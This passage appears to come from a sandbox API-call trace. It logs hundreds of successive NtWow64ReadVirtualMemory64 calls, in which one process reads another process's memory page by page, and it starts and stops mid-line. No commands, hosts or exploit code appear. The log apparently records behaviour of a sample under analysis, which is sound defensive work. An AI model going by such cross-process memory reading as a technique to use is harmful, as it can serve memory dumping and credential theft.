NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xb6c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.270] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.270] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.271] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.329] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.330] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.330] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xb72000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.330] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xb73000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.331] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xb74000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.331] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xb75000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.331] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xb76000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.333] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xb77000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.333] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xb78000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.334] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xb79000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.335] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xb7a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.335] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xb7b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.336] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xb7c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.337] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xb7d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.337] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xb7e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.337] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xb7f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.338] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xb80000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.338] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xb81000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.338] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xb82000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.338] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xb83000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.339] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xb84000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.339] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xb85000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.339] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xb86000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.339] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xb87000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.340] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xb88000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.340] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xb89000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.340] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xb8a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.341] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xb8b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.341] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xb8c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.341] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xb8d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.341] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xb8e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.342] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xb8f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.342] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xb90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.342] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xb91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.342] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xb92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.343] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xb93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.343] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xb94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.343] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xb95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.344] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xb96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.344] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xb97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.344] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xb98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.344] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xb99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.345] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xb9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.345] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xb9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.345] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xb9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.346] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xb9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.346] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xb9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.346] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xb9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.346] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xba0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.348] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xba1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.350] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xba2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.350] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xba3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.350] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xba4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.351] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xba5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.351] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xba6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.351] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xba7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.351] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xba8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.352] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xba9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.352] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xbaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.352] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xbab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.353] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xbac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.353] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xbad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.353] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xbae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.353] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xbaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.354] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xbb0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.354] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xbb1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.354] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xbb2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.355] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xbb3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.355] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xbb4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.355] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xbb5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.356] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xbb6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.356] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xbb7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.356] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xbb8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.357] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xbb9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.357] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xbba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.357] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xbbb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.358] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xbbc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.358] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xbbd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.358] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xbbe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.359] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xbbf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.359] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xbc0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.359] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xbc1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.359] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xbc2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.360] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xbc3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.360] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xbc4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.360] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xbc5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.361] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xbc6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.361] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xbc7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.361] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xbc8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.361] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xbc9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.362] NtWow64ReadVirtualMemory64 (in: 